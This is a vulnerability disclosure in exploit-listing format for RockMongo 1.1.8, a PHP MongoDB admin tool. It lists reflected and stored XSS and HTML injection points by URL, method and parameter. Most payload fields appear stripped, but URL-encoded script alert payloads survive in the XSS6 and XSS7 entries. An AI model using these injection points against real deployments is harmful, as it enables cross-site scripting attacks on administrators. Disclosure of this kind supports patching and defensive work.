################################################################################################################################################# # Exploit Title: RockMongo v1.1.8 - PHP MongoDB Administrator Multiple Vulnerabilities # Date: 11.04.2016 # Exploit Author: Ozer Goker # Vendor Homepage: http://rockmongo.com # Software Link: https://github.com/iwind/rockmongo # Version: [app version] 1.1.8 ################################################################################################################################################# What is RockMongo? RockMongo, a MongoDB administration tool, written in PHP5, is Best in PHP world, more like PHPMyAdmin. source = http://rockmongo.com Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS (Reflected & Stored) XSS details: ################################################################################################################################################# XSS1 (Reflected) URL http://localhost/rockmongo/index.php?action=login.index METHOD Post PARAMETER username PAYLOAD "> ################################################################################################################################################# XSS2 (Reflected) URL http://localhost/rockmongo/index.php?action=login.index METHOD Post PARAMETER db PAYLOAD "> ################################################################################################################################################# XSS3 (Reflected) URL http://localhost/rockmongo/index.php?action=server.createDatabase METHOD Post PARAMETER name PAYLOAD ################################################################################################################################################# XSS4 (Stored) URL http://localhost/rockmongo/index.php?action=db.newCollection&db=test METHOD Post PARAMETER name PAYLOAD ################################################################################################################################################# XSS5 (Reflected) URL http://localhost/rockmongo/index.php?action=server.command&db=test METHOD Post PARAMETER db PAYLOAD ################################################################################################################################################# XSS6 (Reflected) URL http://localhost/rockmongo/index.php?action=collection.removeCollection&db=test&collection=system.indexes%3Cscript%3Ealert%286%29%3C/script%3E METHOD Get PARAMETER collection PAYLOAD ################################################################################################################################################# XSS7 (Reflected) URL http://localhost/rockmongo/index.php?action=collection.index&collection=system.indexes&command=findAll&criteria=%22%3E%3Cscript%3Ealert%287%29%3C/script%3E&db=test&field[0]=_id&format=array&limit=0&order[0]=asc&pagesize=10&query_fields[0]=v METHOD Get PARAMETER criteria PAYLOAD "> ################################################################################################################################################# XSS8 (Reflected) URL http://localhost/rockmongo/index.php/"> METHOD Get PARAMETER URL PAYLOAD "> ################################################################################################################################################# HTML Injection details: ################################################################################################################################################# HTML Injection1 URL http://localhost/rockmongo/index.php?action=login.index METHOD Post PARAMETER username,db PAYLOAD "> ################################################################################################################################################# HTML Injection2 URL http://localhost/rockmongo/index.php?action=server.createDatabase METHOD Post PARAMETER name PAYLOAD